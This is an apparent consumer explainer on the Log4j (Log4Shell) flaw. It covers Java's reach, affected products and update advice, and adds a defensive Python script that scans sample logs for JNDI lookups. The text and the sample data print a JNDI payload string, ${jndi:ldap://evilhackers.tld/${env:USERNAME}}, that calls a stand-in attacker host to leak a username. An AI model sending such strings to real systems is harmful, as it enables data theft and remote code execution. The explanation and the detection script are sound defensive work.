A new software vulnerability may exist on many of the platforms and services you use every day. A software bug in a component called Log4j is potentially present in everything from Android phones to the Minecraft gaming platform. The question on the minds of many consumers: What should we do? According to security firm Norton, the best thing to do is to update your systems and applications. Make sure you are running the latest versions. That way, you can be sure that your programs have the latest patches that fix software bugs.
Here’s what you need to know about the Log4j software vulnerability, how it could affect you, and what’s being done, according to Norton’s experts.
The new software vulnerability affects a component that is prevalent but not well known to average users: Log4j. This vulnerability – or bug – has been nicknamed Log4Shell.
Apache Log4j is an open-source software library used by many Java programs to process and log events such as errors. Most people have probably heard of Java. This cross-platform software is used in many applications, by ordinary people and companies alike. According to Oracle, which manages Java technology, over 13 billion devices run Java (as of 2015).
Do you play Minecraft? You are using Java. Do you have an Android phone? You are using Java. Do you have a smart TV? Chances are it's running Java. Google, LinkedIn, and Amazon use Java. Java is everywhere. And that means this software flaw is almost everywhere as well.
What does the bug do?
The Log4j logging library processes different types of text, such as text in a chat room, web server logs, etc. Generally this is mundane and uneventful. However, it goes astray when it encounters text in a certain format. Log4j performs something called variable expansion. It thinks that a statement of the form "${something}" means that something is a variable, and that it should replace it with some other value; for example, the current date.
However, that something can be a specially crafted URL, and this can cause Log4j to try to fetch the value to be filled in from a remote site. This leaks information: ${jndi:ldap://evilhackers.tld/${env:USERNAME}}. If the URL points to a Java class file – that is, Java program code – the code is fetched, loaded into memory and run without checking whether the code is valid. This is known as Remote Code Execution (RCE) and is a very serious security flaw.
Log4j is used by many of the backend tools that underpin some of the most critical Internet infrastructure we have today, so an exploit may not occur immediately, but can travel up the application stack until some backend application that no one has thought about for years suddenly tries to fetch and run malicious code. Additionally, Log4Shell can be used to break into various Internet services and steal customer data, which can then be used for malicious activity such as identity theft. Ransomware attacks can affect people's workplaces.
Attacks can also be automated, and scanning for this bug has been going on for some time already and has been used to install malware such as coin miners and ransomware. Although servers are the primary concern, client programs are also vulnerable, making this a potential problem for home users. Consumers running vulnerable programs such as Minecraft (which has now been patched) could be attacked by connecting to a malicious server (as Microsoft has noted). Compromising consumer systems can lead to the theft of login credentials and financial information, and to the installation of malware such as cryptominers.
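For readers who run a server and want to check its logs for the kind of string described above, the following is an added example (not from Norton or the Log4j project). It finds "${...}" expressions in log lines, keeps only JNDI lookups, and reports the remote host and any lookup embedded inside them. The log lines are constructed samples, the function names are hypothetical, and it matches only the plain form shown in this article, so it supplements updating rather than replacing it.

```python
import re

# Constructed sample log lines (documentation IP ranges); the lookup string is
# modelled on the example in the text above.
SAMPLE_LOGS = [
    '203.0.113.7 "GET /index.html" 200 "Mozilla/5.0"',
    '203.0.113.9 "GET /" 200 "${jndi:ldap://evilhackers.tld/${env:USERNAME}}"',
    '198.51.100.4 "GET /status" 200 "built ${date:yyyy-MM-dd}"',
]

# A JNDI lookup names a scheme and a remote host that would be contacted.
JNDI = re.compile(r"^\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:}$]+)", re.I)


def extract_lookups(text):
    """Return each outermost ${...} expression, honouring nested braces."""
    found, pos = [], 0
    while True:
        start = text.find("${", pos)
        if start == -1:
            return found
        depth, j = 1, start + 2
        while j < len(text) and depth:
            if text.startswith("${", j):
                depth, j = depth + 1, j + 2
            elif text[j] == "}":
                depth, j = depth - 1, j + 1
            else:
                j += 1
        if depth == 0:
            found.append(text[start:j])
            pos = j
        else:
            pos = start + 2  # unterminated opener: skip it and keep scanning


def triage(line):
    """Describe every JNDI lookup in one log line; ordinary lookups are ignored."""
    findings = []
    for expr in extract_lookups(line):
        m = JNDI.match(expr)
        if m:
            inner = [n[2:-1] for n in extract_lookups(expr[2:-1])]
            findings.append({"scheme": m["scheme"].lower(), "host": m["host"],
                             "embedded": inner, "expr": expr})
    return findings


if __name__ == "__main__":
    for number, line in enumerate(SAMPLE_LOGS, 1):
        for hit in triage(line):
            print(f"line {number}: {hit}")
```

A hit means someone sent the string, not that the system was compromised; whether it had any effect depends on whether a vulnerable Log4j version processed it.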
Which products are unsafe?
The vulnerable versions of Apache Log4j are versions 2.0 to 2.15. New patched versions have been released, but it will take a long time to update these everywhere Log4j is used. As this vulnerability is still being researched, additional patched versions are likely.
The list of vulnerable and potentially vulnerable products that use Log4j is long. An overview is maintained by CISA, and some of the largest software vendors and products available have been listed as vulnerable to some degree. These include Microsoft, IBM, Amazon, Apache, Akamai, Atlassian, Broadcom, Cisco – and the list goes on.
What can you do as a home user?
Apart from keeping your devices as up to date as possible, there isn't much that you can do. If you run any type of Java-enabled server – for example, a Minecraft server – you should make sure all the latest patches are applied.
What are the broad risks of the defect?
Cybercriminals can potentially use the flaw to break into various Internet services and steal user data. That information can be used for more malicious activity such as identity theft.
Are Internet-connected devices at risk?
It's possible that Internet-enabled consumer electronics are at risk. Smart TVs, DVRs, security cameras – if they run a Java-enabled Apache webserver – can be vulnerable and can be taken over by criminals.